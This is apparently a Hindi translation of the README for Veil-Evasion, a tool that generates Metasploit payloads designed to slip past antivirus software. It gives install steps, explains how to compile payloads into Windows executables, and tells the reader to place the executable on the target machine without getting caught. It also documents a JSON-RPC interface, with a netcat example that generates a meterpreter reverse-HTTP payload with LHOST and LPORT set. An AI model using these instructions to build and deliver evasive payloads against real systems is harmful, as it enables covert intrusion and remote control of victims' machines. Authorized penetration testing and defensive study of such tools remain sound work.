
Veil Evasion अब समर्थित नहीं है, Veil 3.0 का उपयोग करें!
Veil-Evasion एक उपकरण है जो मेटास्प्लॉइट पेलोड उत्पन्न करने के लिए डिज़ाइन किया गया है जो सामान्य एंटी-वायरस समाधानों को बायपास करते हैं।
ध्यान दें: प्रत्येक प्रमुख संस्करण अपडेट पर
./setup/setup.shको फिर से चलाया जाना चाहिए। यदि Veil-Evasion चलाने पर कोई बड़ी त्रुटि मिलती है, तो पहले इस स्क्रिप्ट को फिर से चलाने का प्रयास करें ताकि कोई अतिरिक्त पैकेज स्थापित हो सके और सामान्य कॉन्फ़िगरेशन फ़ाइल अपडेट हो सके।
Veil-Evasion वर्तमान में @ChrisTruncer, @TheMightyShiv, @HarmJ0y द्वारा सक्रिय रूप से समर्थित है।
धन्यवाद:
या
ध्यान दें: स्थापना सुपरयूज़र विशेषाधिकारों के साथ की जानी चाहिए। यदि आप Kali Linux का उपयोग नहीं कर रहे हैं, तो प्रत्येक कमांड से पहले
sudoलगाएँ या आरंभ करने से पहले रूट उपयोगकर्ता में बदलें।
Kali x86 पर setup.sh -c चलाएँ।
विंडोज कंप्यूटर पर Python 2.7, Py2Exe, PyCrypto और PyWin32 स्थापित करें (Py2Exe के लिए)।
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
ध्यान दें: यह सुपरयूज़र विशेषाधिकारों के साथ किया जाना चाहिए। यदि आप Kali Linux का उपयोग नहीं कर रहे हैं, तो प्रत्येक कमांड से पहले
sudoलगाएँ या आरंभ करने से पहले रूट उपयोगकर्ता में बदलें।
अधिकांश समय /etc/veil/settings.py पर कॉन्फ़िग फ़ाइल को पुनर्निर्मित करने की आवश्यकता नहीं होगी, लेकिन कुछ मामलों में आपको ऐसा करने का संकेत दिया जा सकता है। यह फ़ाइल config/update.py द्वारा उत्पन्न होती है।
यह महत्वपूर्ण है कि update.py निष्पादित करने से पहले आप config/ निर्देशिका में हों। यदि आप नहीं हैं, तो settings.py गलत होगा और जब आप Veil-Evasion लॉन्च करेंगे तो आपको निम्नलिखित दिखाई देगा।
Main Menu
0 payloads loaded
घबराएँ नहीं। config/ निर्देशिका में जाएँ और update.py को फिर से चलाएँ।
Veil-Evasion को Kali Linux पर चलाने के लिए डिज़ाइन किया गया था, लेकिन इसे किसी भी सिस्टम पर काम करना चाहिए जो Python स्क्रिप्ट निष्पादित करने में सक्षम है। बस कमांड लाइन से Veil-Evasion को कॉल करें, और पेलोड उत्पन्न करने के लिए मेनू का पालन करें। पेलोड बनाने पर, Veil-Evasion पूछेगा कि क्या आप चाहते हैं कि पेलोड फ़ाइल को Pyinstaller या Py2Exe द्वारा एक निष्पादन योग्य में परिवर्तित किया जाए।
यदि Pyinstaller का उपयोग कर रहे हैं, तो Veil-Evasion आपके पेलोड को Kali के भीतर एक निष्पादन योग्य में बदल देगा।
यदि Py2Exe का उपयोग कर रहे हैं, तो Veil-Evasion तीन फ़ाइलें बनाएगा:
तीनों फ़ाइलों को अपनी विंडोज मशीन पर Python स्थापित होने पर ले जाएँ। तीनों फ़ाइलों को उस निर्देशिका के मूल में रखा जाना चाहिए जहाँ Python स्थापित किया गया था (संभवतः C:\Python27)। Python स्क्रिप्ट को निष्पादन योग्य प्रारूप में बदलने के लिए बैच स्क्रिप्ट चलाएँ।
निष्पादन योग्य फ़ाइल को किसी भी आवश्यक माध्यम से अपने लक्ष्य मशीन पर रखें और पकड़े न जाएँ!
लिस्नर की तरफ, चलाएँ:
./Veil-Evasion --rpc
यह पोर्ट 4242 पर एक लिस्नर शुरू करेगा।
क्लाइंट की तरफ, आपको एक क्लाइंट प्रोग्राम चलाने की आवश्यकता होगी। यह एक कस्टम स्क्रिप्ट हो सकती है या Netcat जितना सरल हो सकता है। RPC सर्वर JSON-RPC लागू करता है। JSON-RPC के लिए अनुरोधों और प्रतिक्रियाओं की व्याख्या करने के लिए यह एक अच्छा संदर्भ है: http://json-rpc.org/wiki/specification
RPC अनुरोध प्रारूप इस प्रकार है:
method="version" - वर्तमान Veil-Evasion संस्करण संख्या लौटाएँ
method="payloads" - सभी वर्तमान लोड किए गए पेलोड लौटाएँ
method="payload_options"
params="payload_name" - निर्दिष्ट पेलोड के लिए विकल्प लौटाएँ
method="generate"
params=["payload=X",
"outputbase=Y"
"overwrite=Z",
"msfvenom=...",
"LHOST=blah] - दिए गए विकल्पों के साथ निर्दिष्ट पेलोड उत्पन्न करें और उत्पन्न निष्पादन योग्य का पथ लौटाएँ
Netcat का उपयोग करके Veil-Evasion के साथ काम करने का एक सरल उदाहरण:
root@kali:~# nc 127.0.0.1 4242
{"method":"version","params":[],"id":0}
और सर्वर प्रतिक्रिया:
{"id":0,"result":"2.21.4","error":null}
एक क्लाइंट प्रोग्राम का उदाहरण यहाँ पाया जा सकता है: http://github.com/miligulmohar/python-symmetric-jsonrpc/blob/master/examples/client.py
ध्यान दें: Veil-Evasion के लिए पोर्ट 4242 है। इसके साथ काम करने के लिए client.py में इसे बदला जाना चाहिए।
पेलोड उत्पन्न करने के लिए, सभी पैरामीटर शामिल होने चाहिए:
यह समझने के लिए कि pwnstaller का उपयोग हो रहा है या नहीं, यह एक अच्छा संदर्भ है: http://www.verisgroup.com/blog/2014/05/07/pwnstaller-and-the-veil-framework/
पेलोड उत्पन्न करने का एक उदाहरण:
root@kali:~# nc 127.0.0.1 4242
{"method":"generate","params":["payload=c/meterpreter/rev_http","outputbase=payloadName","LHOST=192.168.1.11","LPORT=2121","pwnstaller=False"],"id":1"}
और सर्वर प्रतिक्रिया:
{"id":8,"result":"/usr/share/veil-output/compiled/payloadName.exe","error":null}
ध्यान दें: यदि अनुरोध में कोई id निर्दिष्ट नहीं है, तो Veil-Evasion बंद हो जाएगा। ऐसा कहने के बाद, आप Veil-Evasion के बंद होने तक जितने चाहें उतने मान्य अनुरोध कर सकते हैं।
RPC सर्वर को बंद करने के लिए चलाएँ:
./Veil-Evasion --rpcshutdown